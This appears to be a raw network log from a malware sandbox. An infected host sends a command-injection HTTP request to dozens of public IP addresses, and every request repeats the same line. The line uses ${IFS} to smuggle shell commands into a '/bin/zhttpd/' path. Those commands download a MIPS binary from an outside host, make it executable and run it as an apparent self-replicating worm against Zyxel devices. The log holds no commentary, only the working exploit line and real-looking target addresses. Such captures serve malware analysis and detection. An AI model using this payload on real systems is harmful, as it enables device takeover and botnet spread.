                                                Jan 28, 2024 10:16:28.867144108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5309192.168.2.2345204221.35.62.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867176056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5310192.168.2.2338684104.13.175.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867177963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5311192.168.2.2336190145.60.11.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867219925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5312192.168.2.2345546110.70.86.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867252111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5313192.168.2.235435692.249.252.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867271900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5314192.168.2.235721873.152.56.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867285967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5315192.168.2.2351204113.85.52.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867312908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5316192.168.2.2357168181.108.180.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867331982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5317192.168.2.2354468170.87.43.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867351055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5318192.168.2.235299054.222.251.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867377043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5319192.168.2.234454018.113.55.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867408991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5320192.168.2.234424876.125.69.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867430925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5321192.168.2.233559059.248.40.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867456913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5322192.168.2.2356012161.106.85.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867465019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5323192.168.2.235915481.84.41.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867495060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5324192.168.2.2336136157.224.135.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867527008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5325192.168.2.2341416135.177.149.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867583036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5326192.168.2.235885864.209.129.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867599964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5327192.168.2.2357264152.179.18.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867624044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5328192.168.2.2354896223.4.202.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867646933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5329192.168.2.2350266174.4.252.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867681980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5330192.168.2.235916472.103.94.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867722034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5331192.168.2.2359864196.56.24.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867748022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5332192.168.2.2347298130.7.32.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867772102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5333192.168.2.235696494.147.97.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867788076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5334192.168.2.235294075.244.10.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867822886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5335192.168.2.2350170212.37.61.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867867947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5336192.168.2.233801695.222.208.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867896080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5337192.168.2.2355400158.19.35.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867922068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5338192.168.2.235269420.167.63.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867976904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5339192.168.2.233536642.51.145.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.867985964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5340192.168.2.233790614.133.181.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868012905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5341192.168.2.234030053.149.245.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868046045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5342192.168.2.2340048180.234.2.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868048906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5343192.168.2.2334588160.193.196.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868089914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5344192.168.2.2341226109.84.62.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868099928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5345192.168.2.236043217.232.57.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868160963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5346192.168.2.2342550100.233.130.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868182898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5347192.168.2.2360888213.200.246.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868211031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5348192.168.2.2358104199.79.231.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868247986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5349192.168.2.233850089.90.164.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868280888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5350192.168.2.2348726160.64.150.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868309021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5351192.168.2.2351786191.229.239.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868329048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5352192.168.2.2338198159.36.14.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868351936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5353192.168.2.234674660.102.241.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868380070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5354192.168.2.2359582177.69.27.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868443966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5355192.168.2.235638218.180.36.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868454933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5356192.168.2.2345834218.111.197.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868489027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5357192.168.2.233383443.87.253.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868494987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5358192.168.2.2359778155.203.7.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868521929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5359192.168.2.2358360132.90.116.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868570089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5360192.168.2.2344872145.152.166.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868592978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5361192.168.2.2342064219.107.188.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868598938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5362192.168.2.2345116116.243.95.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868650913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5363192.168.2.235639639.23.187.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868666887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5364192.168.2.234539087.234.98.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868705988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5365192.168.2.2354474207.29.138.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868737936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5366192.168.2.2357808139.28.75.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868757963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5367192.168.2.2354496174.125.186.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868784904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5368192.168.2.234455474.203.193.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868818998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5369192.168.2.2343664160.32.31.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:28.868855000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5370192.168.2.2333276195.98.183.15443
                                                TimestampBytes transferredDirectionData
